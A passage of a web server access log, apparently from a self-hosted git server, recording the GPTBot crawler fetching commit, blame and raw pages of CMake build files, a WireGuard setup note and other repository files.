(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/start.sh" +[17/Feb/2026:14:51:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fobj%2fDebug%2fnet8.0" [Client 74.7.227.38] [Length 25379] [Gzip 5.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0" +[17/Feb/2026:14:51:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21649] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:14:51:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11872] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:51:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21337] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:51:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11302] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:51:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14157] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:51:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11145] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:51:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:14:51:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:14:51:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21646] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:14:51:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10221] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:51:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14724] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:51:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:14:51:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:14:52:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11065] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:14:52:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 10241] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:52:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10229] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:52:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 31150] [Gzip 11.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:52:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10662] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:52:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 467] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:52:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 28166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:52:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10000] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:14:52:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10002] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:14:52:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:14:52:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:14:52:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 6458] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:14:52:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4766] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:14:52:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:14:52:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=html%2fassets%2fimages%2fBatchControl.png" [Client 74.7.227.38] [Length 18721] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/BatchControl.png" +[17/Feb/2026:14:52:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 10167] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:14:52:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 10172] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:14:52:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 10136] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:14:52:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 10169] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:14:52:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 10167] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:14:52:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/base_library.zip" [Client 74.7.227.38] [Length 10911] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol" +[17/Feb/2026:14:52:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=.Backup%2fhtml" [Client 74.7.227.38] [Length 106390] [Gzip 10.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" +[17/Feb/2026:14:52:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 130631] [Gzip 16.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977" +[17/Feb/2026:14:52:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 15616] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build" +[17/Feb/2026:14:52:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 15616] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build" +[17/Feb/2026:14:52:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" [Client 74.7.227.38] [Length 11739] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0" +[17/Feb/2026:14:52:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" [Client 74.7.227.38] [Length 10929] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0" +[17/Feb/2026:14:52:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 24359] [Gzip 5.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" +[17/Feb/2026:14:52:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10864] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.gitignore" +[17/Feb/2026:14:52:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10291] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:52:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr 